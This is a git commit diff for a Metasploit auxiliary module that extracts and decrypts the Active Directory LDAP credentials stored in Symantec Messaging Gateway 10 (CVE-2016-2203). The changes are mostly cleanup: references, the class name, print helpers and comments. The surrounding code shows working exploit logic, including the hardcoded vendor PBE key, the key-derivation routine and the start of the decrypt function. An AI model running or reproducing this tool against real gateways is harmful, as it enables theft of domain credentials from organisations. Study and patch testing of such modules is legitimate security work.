added modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb

bug/bundler_fix
Karim Reda Fakhir 2016-04-20 17:01:18 +01:00
parent dc3a185519
commit c322a4b314
1 changed files with 65 additions and 42 deletions

View File

@ -9,7 +9,7 @@ require 'digest'
require "openssl"
class Metasploit3 < Msf::Auxiliary
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
@ -19,18 +19,19 @@ class Metasploit3 < Msf::Auxiliary
super(update_info(info,
'Name' => 'Symantec Messaging Gateway 10 LDAP Creds Graber',
'Description' => %q{
This module will grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed symantec pbe key. Note that authentication is required in order to successfully grab the LDAP credentials, you need at least a read account.
This module will grab the AD account saved in Symantec Messaging Gateway and then decipher it using the disclosed symantec pbe key. Note that authentication is required in order to successfully grab the LDAP credentials, you need at least a read account. Version 10.6.0-7 and earlier are affected
},
'References' =>
[
'https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00',
'CVE-2016-2203'
['URL','https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00'],
['CVE','2016-2203'],
['BID','86137']
],
'Author' =>
[
'Fakhir Karim Reda <karim.fakhir[at]gmail.com>',
'zirsalem'
],
'DefaultOptions' =>
{
@ -51,6 +52,19 @@ class Metasploit3 < Msf::Auxiliary
deregister_options('RHOST')
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def report_cred(opts)
service_data = {
address: opts[:ip],
@ -126,22 +140,29 @@ class Metasploit3 < Msf::Auxiliary
return sid, last_login
end
# Returns the status of the listening port.
#
# @return [Boolean] TrueClass if port open, otherwise FalseClass.
def port_open?
begin
res = send_request_raw({'method' => 'GET', 'uri' => '/'}, datastore['TIMEOUT'])
return true if res
rescue ::Rex::ConnectionRefused
vprint_status("#{peer} - Connection refused")
print_status("#{peer} - Connection refused")
return false
rescue ::Rex::ConnectionError
vprint_error("#{peer} - Connection failed")
print_error("#{peer} - Connection failed")
return false
rescue ::OpenSSL::SSL::SSLError
vprint_error("#{peer} - SSL/TLS connection error")
print_error("#{peer} - SSL/TLS connection error")
return false
end
end
# Returns the derived key from the password, the salt and the iteration count number.
#
# @return Array of byte containing the derived key.
def get_derived_key(password, salt, count)
key = password + salt
for i in 0..count-1
@ -152,7 +173,9 @@ class Metasploit3 < Msf::Auxiliary
end
# @Return the deciphered password
# Algorithm obtained by reversing the firmware
#
def decrypt(enc_str)
pbe_key="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-="
salt = (Base64.strict_decode64(enc_str[0,12]))